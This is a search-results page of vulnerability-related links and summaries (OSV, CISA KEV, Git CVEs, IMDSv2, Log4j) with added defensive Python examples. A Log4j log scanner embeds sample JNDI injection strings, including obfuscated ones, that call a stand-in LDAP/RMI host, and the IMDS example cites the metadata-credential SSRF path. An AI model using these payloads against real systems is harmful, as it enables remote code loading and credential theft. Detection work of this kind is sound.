
Search results for "Vulnerabilities": 1 - 40 of 86

Because the tag search matched too few entries, title search results are shown instead.

There are 86 entries about Vulnerabilities. Related tags include security, セキュリティ (security) and 脆弱性 (vulnerability). Popular entries include "Google launches the 'OSV' (Open Source Vulnerabilities) project, a per-version database of vulnerabilities in open-source software".
• Google launches the "OSV" (Open Source Vulnerabilities) project, a per-version database of vulnerabilities in open-source software

  Google has announced the launch of the "OSV" (Open Source Vulnerabilities) project, which builds a database of vulnerabilities in open-source software with details such as the version in which each vulnerability was introduced and the version in which it was fixed. Open source now plays an important role everywhere from cloud infrastructure to applications, so accurate management of vulnerability information is becoming more important as well. With OSV, developers and maintainers of open-source software can report vulnerabilities, which used to take considerable effort, more easily. Users get accurate information, such as when a vulnerability in the software they use was fixed, in a simple and consistent way, which makes managing and responding to vulnerabilities faster and easier. If reproduction steps for the bug are provided, OSV automatically searches out the version information
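As an added example (not code from Google's OSV project), the following Python shows how the per-version data that OSV records is consumed in practice: an advisory lists, per package, ordered "introduced" and "fixed" events, and a scanner decides whether an installed version falls inside one of the resulting [introduced, fixed) intervals. The advisory record, the package name example-widget and all version numbers below are constructed for this example and are not a real OSV entry.

```python
"""Added example (not OSV project code): check an installed version against
the "introduced"/"fixed" events of an OSV-format advisory.

The record below is constructed for this example: its id, package and
versions are invented and do not correspond to a real advisory."""
from typing import Dict, List, Optional, Tuple

SAMPLE_OSV_RECORD: Dict = {
    "id": "EXAMPLE-2021-0001",  # constructed identifier
    "summary": "Constructed: example-widget accepts oversized input",
    "affected": [
        {
            "package": {"ecosystem": "PyPI", "name": "example-widget"},
            "ranges": [
                {
                    "type": "SEMVER",
                    # Events are ordered; each "introduced" opens a vulnerable
                    # interval that the next "fixed" closes.
                    "events": [
                        {"introduced": "1.2.0"},
                        {"fixed": "1.4.2"},
                        {"introduced": "2.0.0"},
                        {"fixed": "2.1.0"},
                    ],
                }
            ],
        }
    ],
}


def parse_version(version: str) -> Tuple[int, ...]:
    """Dotted numeric version -> comparable tuple. OSV uses "0" to mean
    "every version"; pre-release tags are not handled in this example."""
    return tuple(int(part) for part in version.split("."))


def events_to_intervals(events: List[Dict]) -> List[Tuple[str, Optional[str]]]:
    """Flatten OSV events into [introduced, fixed) pairs; an "introduced"
    with no following "fixed" is an open-ended interval (fixed=None)."""
    intervals: List[Tuple[str, Optional[str]]] = []
    start: Optional[str] = None
    for event in events:
        if "introduced" in event:
            if start is not None:  # two "introduced" in a row: first is open-ended
                intervals.append((start, None))
            start = event["introduced"]
        elif "fixed" in event and start is not None:
            intervals.append((start, event["fixed"]))
            start = None
    if start is not None:
        intervals.append((start, None))
    return intervals


def is_affected(record: Dict, ecosystem: str, name: str, version: str) -> bool:
    """True if (ecosystem, name, version) lies in any SEMVER range of the record."""
    ver = parse_version(version)
    for affected in record.get("affected", []):
        package = affected.get("package", {})
        if package.get("ecosystem") != ecosystem or package.get("name") != name:
            continue
        for rng in affected.get("ranges", []):
            if rng.get("type") != "SEMVER":
                continue  # GIT and ECOSYSTEM ranges need ecosystem-specific comparison
            for introduced, fixed in events_to_intervals(rng["events"]):
                low = () if introduced == "0" else parse_version(introduced)
                if ver < low:
                    continue
                if fixed is None or ver < parse_version(fixed):
                    return True
    return False


def affected_report(record: Dict, ecosystem: str, name: str,
                    versions: List[str]) -> Dict[str, bool]:
    """Map each candidate version to whether the advisory covers it."""
    return {v: is_affected(record, ecosystem, name, v) for v in versions}


if __name__ == "__main__":
    report = affected_report(SAMPLE_OSV_RECORD, "PyPI", "example-widget",
                             ["1.1.9", "1.2.0", "1.4.1", "1.4.2", "2.0.5", "2.1.0"])
    for v, hit in report.items():
        print(f"{v:>6}: {'affected' if hit else 'ok'}")
```

The interval logic is the part worth getting right: a version equal to "fixed" is not affected, a version equal to "introduced" is, and an "introduced" of "0" covers everything below the first fix. GIT ranges (commit hashes) and ECOSYSTEM ranges (e.g. Debian version strings) cannot be compared with this tuple parser and are skipped here on purpose.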
• The History of DNS Vulnerabilities and the Cloud

  By Daniel Prizmant, December 28, 2020 at 6:00 AM. Category: Unit 42. Tags: DNS, vulnerabilities. Introduction: Every now and then, a new domain name system (DNS) vulnerability that puts billions of devices around the world at risk is discovered. DNS vulnerabilities are usually critical. Just imagine that you browse to your bank account website, but instead
• Spring4Shell: Security Analysis of the latest Java RCE '0-day' vulnerabilities in Spring | LunaTrace

  Getting Spring to load BinderControllerAdvice may require manual steps. We'll update this guide with more details about how to do that soon. import org.springframework.core.Ordered; import org.springframework.core.annotation.Order; import org.springframework.web.bind.WebDataBinder; import org.springframework.web.bind.annotation.ControllerAdvice; import org.springframework.web.bind.
• Git security vulnerabilities announced | The GitHub Blog

  Git users are encouraged to upgrade to the latest version, especially if they use `git archive`, work in untrusted repositories, or use Git GUI on Windows. Today, the Git project released new versions to address a pair of security vulnerabilities, CVE-2022-41903 and CVE-2022-23521, that affect versions 2.39 and older. Git for Windows was al
• OSV - Open Source Vulnerabilities

  Vulnerability counts per ecosystem as shown on the page when it was captured: AlmaLinux 2722, Alpine 3398, Android 881, Bitnami 3898, crates.io 1348, Debian 9859, GIT 32996, Go 2151, Linux 13573, Maven 4873, n

• ContainerCVE: Scan Docker containers for security vulnerabilities

  Quickly find the CVE's for any public Docker Hub image. Powered by the popular open-source tool Trivy.
• Notes on not being driven by the CVSS base score alone in vulnerability management [CVSS v2.0 edition] – Feat. Known Exploited Vulnerabilities Catalog

  ■ What is the Known Exploited Vulnerabilities Catalog? The "Known Exploited Vulnerabilities Catalog" (hereafter KEVC) is information that CISA (Cybersecurity & Infrastructure Security Agency) of the US Department of Homeland Security has published since November 3, 2021; as the name says, it is a catalog of vulnerabilities known to have been exploited. As of February 4, 2022 the catalog listed 352 vulnerabilities; these have confirmed exploitation and a significant impact on the US federal government, so they can be judged to need urgent handling. The items recorded for each catalog entry are as follows: CVE number (CVE), vendor/project name (Vendor/Product), product vulnerability name (Vulnerability Name)
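Added example, not code from the blog post or from CISA: a Python snippet that re-ranks scanner findings with the catalog as the first signal and the CVSS base score only as a tie-breaker, which is the point of the post. The field names (cveID, vendorProject, product, vulnerabilityName, dateAdded, requiredAction, dueDate) follow the layout of CISA's published known_exploited_vulnerabilities.json; the catalog entries, CVE identifiers of the form CVE-0000-nnnn, asset names and findings are all constructed for the example.

```python
"""Added example (not code from the blog post or from CISA): rank scanner
findings with the KEV catalog as the first signal and the CVSS base score
only as a tie-breaker.

Field names mirror CISA's known_exploited_vulnerabilities.json layout;
every entry, CVE identifier and finding below is constructed."""
from datetime import date
from typing import Dict, List

CONSTRUCTED_KEV: Dict = {
    "vulnerabilities": [
        {
            "cveID": "CVE-0000-1111",  # constructed identifier
            "vendorProject": "ExampleCorp",
            "product": "Gateway",
            "vulnerabilityName": "ExampleCorp Gateway authentication bypass (constructed)",
            "dateAdded": "2022-01-10",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2022-01-24",
        },
        {
            "cveID": "CVE-0000-2222",  # constructed identifier
            "vendorProject": "ExampleCorp",
            "product": "DB Server",
            "vulnerabilityName": "ExampleCorp DB Server deserialization (constructed)",
            "dateAdded": "2021-11-17",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2021-12-01",
        },
    ]
}

# Constructed scanner output: CVE, CVSS base score, affected asset.
CONSTRUCTED_FINDINGS: List[Dict] = [
    {"cve": "CVE-0000-1111", "cvss": 6.5, "asset": "edge-gw-01"},
    {"cve": "CVE-0000-3333", "cvss": 9.8, "asset": "build-runner-07"},
    {"cve": "CVE-0000-2222", "cvss": 7.2, "asset": "db-02"},
    {"cve": "CVE-0000-4444", "cvss": 4.3, "asset": "intranet-wiki"},
]


def index_kev(kev: Dict) -> Dict[str, Dict]:
    """CVE id -> catalog entry, for O(1) lookups while ranking."""
    return {entry["cveID"]: entry for entry in kev["vulnerabilities"]}


def prioritize(findings: List[Dict], kev: Dict, today: date) -> List[Dict]:
    """Order: KEV-listed and past its due date first, then other KEV-listed,
    then everything else by CVSS descending. Each result carries the
    catalog's requiredAction so a ticket can quote it."""
    kev_index = index_kev(kev)
    ranked = []
    for finding in findings:
        entry = kev_index.get(finding["cve"])
        in_kev = entry is not None
        overdue = in_kev and date.fromisoformat(entry["dueDate"]) < today
        ranked.append({
            **finding,
            "in_kev": in_kev,
            "overdue": overdue,
            "required_action": entry["requiredAction"] if entry else None,
        })
    # Booleans sort False < True, so negate them to put KEV/overdue first.
    ranked.sort(key=lambda r: (not r["in_kev"], not r["overdue"], -r["cvss"]))
    return ranked


def ranked_cves(findings: List[Dict], kev: Dict, today: date) -> List[str]:
    """Convenience view: just the CVE ids in priority order."""
    return [r["cve"] for r in prioritize(findings, kev, today)]


if __name__ == "__main__":
    for row in prioritize(CONSTRUCTED_FINDINGS, CONSTRUCTED_KEV, date(2022, 1, 20)):
        flag = "KEV overdue" if row["overdue"] else ("KEV" if row["in_kev"] else "-")
        print(f"{row['cve']}  cvss={row['cvss']:<4} {flag:<12} {row['asset']}")
```

Run against the constructed data on 2022-01-20, the 7.2 and 6.5 findings outrank the 9.8 one because the catalog says they are exploited in the wild; the 9.8 score still wins among the non-catalog findings. In a real pipeline the catalog JSON is downloaded from CISA and the findings come from the scanner's export; the ranking logic does not change.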
• GitHub - google/tsunami-security-scanner: Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence.
• GitHub - bridgecrewio/checkov: Prevent cloud misconfigurations and find vulnerabilities during build-time in infrastructure as code, container images and open source packages with Checkov by Bridgecrew.

  Over 1000 built-in policies cover security and compliance best practices for AWS, Azure and Google Cloud. Scans Terraform, Terraform Plan, Terraform JSON, CloudFormation, AWS SAM, Kubernetes, Helm, Kustomize, Dockerfile, Serverless framework, Ansible, Bicep and ARM template files. Scans Argo Workflows, Azure Pipelines, BitBucket Pipelines, Circle CI Pipelines, GitHub Actions and GitLab CI workflow
• Git security vulnerabilities announced

  Git users are encouraged to upgrade to the latest version, especially if they use `git apply` or `git clone` against untrusted patches or repositories. Today, the Git project released new versions to address a pair of security vulnerabilities (CVE-2023-22490 and CVE-2023-23946) that affect versions 2.39.1 and older. These affect Git's local
• Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service | Amazon Web Services

  AWS Security Blog. July 27, 2021: We've updated the link to the 2019 re:Invent session on this topic. Since it first launched over 10 years ago, the Amazon EC2 Instance Metadata Service (IMDS) has helped customers build secure and scalable applications. The I
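Added example, not AWS code: an in-memory model of the session-oriented IMDSv2 handshake that the post introduces, written to show why a bare SSRF GET against the metadata endpoint stops returning credentials. The header names (X-aws-ec2-metadata-token-ttl-seconds on the token PUT, X-aws-ec2-metadata-token on later GETs) and the 21600 second maximum TTL follow the public IMDSv2 documentation, as does the refusal of token PUTs that carry X-Forwarded-For; the HTTP status codes, the credential payload and the require_v2 switch (standing in for the instance's HttpTokens=required setting) are assumptions of this simulation.

```python
"""Added example (not AWS code): an in-memory model of the IMDSv2 handshake,
to show why a bare SSRF GET no longer yields instance credentials.

Header names and the 21600 s maximum TTL follow the public IMDSv2
documentation; the status codes, the credential payload and the
require_v2 switch (standing in for HttpTokens=required) are assumptions
of this simulation."""
import secrets
import time
from typing import Callable, Dict, Optional, Tuple

TOKEN_PATH = "/latest/api/token"
TTL_HEADER = "x-aws-ec2-metadata-token-ttl-seconds"
TOKEN_HEADER = "x-aws-ec2-metadata-token"
MAX_TTL_SECONDS = 21600

# Constructed metadata; the credential values are fake strings, not real keys.
CONSTRUCTED_METADATA: Dict[str, str] = {
    "/latest/meta-data/instance-id": "i-0123456789abcdef0",
    "/latest/meta-data/iam/security-credentials/example-role":
        '{"AccessKeyId": "EXAMPLEKEY", "SecretAccessKey": "constructed-secret"}',
}


class FakeImds:
    """Minimal IMDS endpoint model. require_v2=True means token-less GETs
    are refused, like an instance launched with HttpTokens=required."""

    def __init__(self, require_v2: bool = True,
                 clock: Callable[[], float] = time.time):
        self.require_v2 = require_v2
        self.clock = clock
        self._tokens: Dict[str, float] = {}  # token -> expiry timestamp

    def request(self, method: str, path: str,
                headers: Optional[Dict[str, str]] = None) -> Tuple[int, str]:
        hdrs = {k.lower(): v for k, v in (headers or {}).items()}

        if method == "PUT" and path == TOKEN_PATH:
            # A request relayed by a proxy carries X-Forwarded-For; IMDSv2
            # refuses to mint a token for it (open reverse proxy case).
            if "x-forwarded-for" in hdrs:
                return 403, ""
            try:
                ttl = int(hdrs[TTL_HEADER])
            except (KeyError, ValueError):
                return 400, ""
            if not 1 <= ttl <= MAX_TTL_SECONDS:
                return 400, ""
            token = secrets.token_urlsafe(32)
            self._tokens[token] = self.clock() + ttl
            return 200, token

        if method == "GET":
            token = hdrs.get(TOKEN_HEADER)
            if token is not None:
                if self._tokens.get(token, 0.0) <= self.clock():
                    return 401, ""  # unknown or expired token
            elif self.require_v2:
                return 401, ""  # IMDSv1-style GET without a token, refused
            if path in CONSTRUCTED_METADATA:
                return 200, CONSTRUCTED_METADATA[path]
            return 404, ""

        return 405, ""


def ssrf_fetch(imds: FakeImds, path: str) -> Tuple[int, str]:
    """What a typical SSRF primitive gives an attacker: one GET, no custom
    method and no custom headers."""
    return imds.request("GET", path)


def v2_client_fetch(imds: FakeImds, path: str, ttl: int = 300) -> Tuple[int, str]:
    """Legitimate client on the instance: mint a session token, then GET."""
    status, token = imds.request("PUT", TOKEN_PATH, {TTL_HEADER: str(ttl)})
    if status != 200:
        return status, ""
    return imds.request("GET", path, {TOKEN_HEADER: token})


if __name__ == "__main__":
    creds = "/latest/meta-data/iam/security-credentials/example-role"
    print("v1 allowed, SSRF GET: ", ssrf_fetch(FakeImds(require_v2=False), creds))
    print("v2 required, SSRF GET:", ssrf_fetch(FakeImds(), creds))
    print("v2 required, client:  ", v2_client_fetch(FakeImds(), creds))
```

The model leaves out one real IMDSv2 defence that cannot be shown in-process: the token response is sent with an IP TTL of 1 (the hop limit), so even a PUT that reaches the service through a container or proxy on another hop never gets its token back. The three in-process checks (PUT required, X-Forwarded-For refused, token expiry) are enough to show why the classic `GET /latest/meta-data/iam/security-credentials/` SSRF payload fails once HttpTokens is set to required.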
• TCP SACK PANIC - Kernel vulnerabilities - CVE-2019-11477, CVE-2019-11478 & CVE-2019-11479 | Red Hat Customer Portal
• An Exploration & Remediation of JSON Interoperability Vulnerabilities
• GraphQL Vulnerabilities | Application Security Cheat Sheet

  GraphQL is a query language designed to build client applications by providing an intuitive and flexible syntax and system for describing their data requirements and interactions. GraphQL uses a declarative approach to fetching data: clients can specify exactly what data they need from the API. As a result, GraphQL provides a single endpoint, which allows clients to get the necessary data, instead
• Known Exploited Vulnerabilities Catalog | CISA

• GitHub - anouarbensaad/vulnx: vulnx 🕷️ an intelligent Bot, Shell can achieve automatic injection, and help researchers detect security vulnerabilities CMS system. It can perform a quick CMS security detection, information collection (including sub-domain

  vulnx 🕷️ is an intelligent bot/shell that can perform automatic injection and help researchers detect security vulnerabilities in CMS systems. It can perform quick CMS security detection, information collection (including sub-domain name, IP address, country information, organizational information and time zone, etc.) and vulnerability scanning.
• Spam attack on Twitter/X rival Mastodon highlights 'fediverse' vulnerabilities | TechCrunch

  A spam attack that impacted the open source X rival Mastodon, Misskey and other apps highlights how the decentralized social web, also known as the fediverse, is open to abuse. Over the past several days, attackers have targeted smaller Mastodon servers, taking advantage of open registrations to automate the creation of
• The forces and vulnerabilities of the Apache model

  Blog? Why do people use words containing 'log' so often? The initial title for this article was "Why the Apache model sucks". It would have been a catchier title but would taint my arguments with triviality. But it was the first title that came to my mind and you should be aware of that. I have written about Apache in the past and the present post is a rehash with a slightly different emphasi

• half of curl's vulnerabilities are C mistakes | daniel.haxx.se

  I spent a lot of time and effort digging up the numbers and facts for this post! Lots of people keep referring to the awesome summary put together by a friendly pseudonymous "Tim" which says that "53 out of 95" (55.7%) security flaws in curl could've been prevented if curl had been written in Rust. This is usually in regards to discussions around how insecure C is and what to do about it. I've blo

• Leaky Vessels: Docker and runc Container Breakout Vulnerabilities - January 2024 | Snyk

  We will continue to update this blog with any key updates, including updates on the disclosure of any new related vulnerabilities. This blog includes links to detailed blogs on each of the disclosed vulnerabilities, as well as two open source tools to aid in exploit detection. Snyk security researcher Rory McNamara, with the Snyk Security Labs team, identified four vulnerabilities — dubbed "Leaky
• Amazon Inspector Now Scans AWS Lambda Functions for Vulnerabilities | Amazon Web Services

  AWS News Blog. Amazon Inspector is a vulnerability management service that continually scans workloads across Amazon Elastic Compute Cloud (Amazon EC2) instances, container images living in Amazon Elastic Container Registry (Amazon ECR), and, starting today, AWS Lambda functions and Lambda layers. Until today, customers that wanted
• /blog/2021/03/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/

• GitHub - NCSC-NL/OpenSSL-2022: Operational information regarding CVE-2022-3602 and CVE-2022-3786, two vulnerabilities in OpenSSL 3
• Practical Approach to Automate the Discovery and Eradication of Open-Source Software Vulnerabilities at Scale

  Slides: Practical Approach to Automate the Discovery and Eradication of Open-Source Software Vulnerabilities at Scale. Aladdin Almubayed, Senior Application Security Engineer @ Netflix (@0xshellrider). Outline: The problem of open source security (5 minutes); Attacks on open source dependencies (10 minutes); Our approach (25 minutes); Challenges & Future work (5 minutes).

• Tsunami: An extensible network scanning engine to detect severity vulnerabilities with confidence

  Google Open Source Blog. We have released the Tsunami security scanning engine to the open source communities. We hope that the engine can help other organizations protect their users' data. We also hope to foster colla
• OpenSSL Statement on the Recent Intel/AMD Downfall/Inception Vulnerabilities - OpenSSL Blog

  Last week marked the public announcement of the Downfall vulnerability in Intel CPUs and the Inception vulnerability in AMD CPUs. Both of these are microarchitectural side-channel attacks allowing an attacker with unprivileged execution on the same physical core as a victim process to extract confidential information from that process. This blog post provides information and advice for users of Op

• GitHub - Speykious/cve-rs: Blazingly 🔥 fast 🚀 memory vulnerabilities, written in 100% safe Rust. 🦀
• Helping You Better Identify Vulnerabilities in Partnership with Snyk | Docker

  We are really excited that Docker and Snyk are now partnering together to engineer container security scanning deeply into Docker Desktop and Docker Hub. Image vulnerability scanning has been one of your most requested items on our public roadmap. Modern software uses a lot of third party open source libraries, indeed this is one
• Git security vulnerabilities announced

  Upgrade your local installation of Git, especially when cloning with --recurse-submodules from untrusted repositories, or if you use git shell interactive mode. Today, the Git project released new versions to address a pair of security vulnerabilities (CVE-2022-39253 and CVE-2022-39260) that affect versions 2.38 and older. These affect Git'
• GitHub - snyk/cli: Snyk CLI scans and monitors your projects for security vulnerabilities.

  Snyk is a developer-first, cloud-native security tool to scan and monitor your software development projects for security vulnerabilities. Snyk scans multiple content types for security issues: Snyk Open Source: Find and automatically fix open-source vulnerabilities. Snyk Code: Find and fix vulnerabilities in your application code in real time. Snyk Container: Find and fix vulnerabilities in contain
• Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021

  Critical Vulnerabilities in Apache Log4j Java Logging Library. On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library, affecting all Log4j2 versions earlier than 2.15.0, was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints. On December 14, 2021, the following critical vuln

• Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program

  I want to share my frustrating experience participating in Apple Security Bounty program. I've reported four 0-day vulnerabilities this year between March 10 and May 4; as of now three of them are still present in the latest iOS version (15.0) and one was fixed in 14.7, but Apple decided to cover it up and
• GitHub - cisagov/log4j-scanner: log4j-scanner is a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

  Configure your own DNS server (preferred): add DNS records to your domain (example.com): an A record pointing test.example.com to your IP address, and an NS record (ns1.example.com) whose value is the test.example.com host chosen above. Host a DNS server to log the DNS requests made to your domain. Install the required modules: pip3 install -r requirements.txt. Modify the dns/ddnsserver.py script
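Added example covering both the Cisco Log4j advisory entry above and this cisagov/log4j-scanner entry; it is not code from either project. The scanner detects a vulnerable service from the outside by watching for the JNDI callback on the DNS server it has you set up; the Python below is the complementary log-side check a responder runs over web server logs. Log4j resolves nested lookups from the inside out, so attackers hide the `${jndi:` prefix behind `${lower:...}`, `${upper:...}` and `${key:-default}` wrappers; the normaliser performs the same inside-out rewrite and flags lines that collapse to a JNDI lookup. The log lines, the 203.0.113.10 address and the lookup-resolution rules are constructed and simplified for the example (it models only those three lookup forms, not base64, date or other lookups).

```python
"""Added example (not code from Cisco or from cisagov/log4j-scanner): a
log-side check for CVE-2021-44228 style payloads.  Log4j resolves nested
lookups from the inside out, so attackers hide "${jndi:" behind
${lower:...}, ${upper:...} and ${key:-default} wrappers; this normaliser
does the same inside-out rewrite and flags lines that collapse to a JNDI
lookup.  The resolution rules are a simplified subset (no base64, date or
other lookups); the log lines and the 203.0.113.10 address are constructed."""
import re
from typing import Dict, List, Tuple

# Innermost lookup: a ${...} whose body contains no further $, { or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def resolve_lookup(body: str):
    """Rewrite one innermost lookup body. Returns None when the body is a
    JNDI lookup, which is the signal we are scanning for."""
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return None
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${key:-default}: Log4j substitutes the default when key is unknown,
        # which is what makes "${::-j}" evaluate to "j".
        return body.split(":-", 1)[1]
    return ""  # any other lookup: treat as unresolvable and drop it


def normalize_lookups(text: str, max_rounds: int = 20) -> Tuple[str, bool]:
    """Resolve innermost lookups round by round. Returns (normalised text,
    jndi_found). Every round removes at least one "${", so it terminates."""
    for _ in range(max_rounds):
        if not INNERMOST.search(text):
            return text, False
        found = False

        def substitute(match) -> str:
            nonlocal found
            replacement = resolve_lookup(match.group(1))
            if replacement is None:
                found = True
                return match.group(0)  # keep ${jndi:...} visible in the output
            return replacement

        text = INNERMOST.sub(substitute, text)
        if found:
            return text, True
    return text, False


# Constructed access-log lines (Apache combined format); lines 2-4 carry a
# plain, a case-obfuscated and a default-value-obfuscated JNDI payload.
CONSTRUCTED_LOG_LINES: List[str] = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.10/b} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Dec/2021:12:00:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.10/c}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:15 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]


def scan_lines(lines: List[str]) -> List[Dict]:
    """Return one finding per line that normalises to a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, 1):
        normalized, hit = normalize_lookups(line)
        if hit:
            findings.append({"line": number, "normalized": normalized})
    return findings


if __name__ == "__main__":
    for finding in scan_lines(CONSTRUCTED_LOG_LINES):
        print(f"line {finding['line']}: {finding['normalized']}")
```

A plain substring search for `${jndi:` misses lines 3 and 4 of the constructed input; the inside-out rewrite catches them because it evaluates the wrappers the way Log4j would before checking the prefix. The `normalized` field in each finding is the de-obfuscated payload, which is what you want in the ticket and in the IOC list (the callback host and port). Lines that never contain a lookup are left untouched, so the check is cheap enough to run over a full day of logs.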
• GitHub - lirantal/is-website-vulnerable: finds publicly known security vulnerabilities in a website's frontend JavaScript libraries
• Docker Security Advisory: Multiple Vulnerabilities in runc, BuildKit, and Moby | Docker

  * Only CVE-2024-21626 and CVE-2024-24557 were fixed in Moby 24.0.9. If you are unable to update to an unaffected version promptly after it is released, follow these best practices to mitigate risk: Only use trusted Docker images (such as Docker Official Images). Don't build Docker images from untrusted sources or untrusted Dockerfiles. If you are a Docker Business customer using Docker Desktop and
• Git security vulnerabilities announced

  A new set of Git releases were published to address a variety of security vulnerabilities. All users are encouraged to upgrade. Take a look at GitHub's view of the latest round of releases. Today, the Git project released new versions to address a pair of security vulnerabilities, CVE-2023-25652 and CVE-2023-29007, that affect versions 2.40.
• Vulnerability Spotlight: Two vulnerabilities in Zoom could lead to code execution

  A member of Cisco Talos discovered this vulnerability. Cisco Talos recently discovered two vulnerabilities in the popular Zoom video chatting application that could allow a malicious user to execute arbitrary code on victims' machines. Video conferencing software has skyrocketed in popularity during the COVID-19 pand
• /blog/2022/09/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/

• Snyk research team discovers severe prototype pollution security vulnerabilities affecting all versions of lodash | Snyk

  On July 2nd, 2019, Snyk published a high severity prototype pollution security vulnerability (CVE-2019-10744) affecting all versions of lodash, as the result of an on-going analysis led by the Snyk security research team. UPDATE: lodash published version 4.17.12 on July 9th which includes Snyk fixes and remediates the vulnerability. We strongly recommend you update to the latest version of lodash
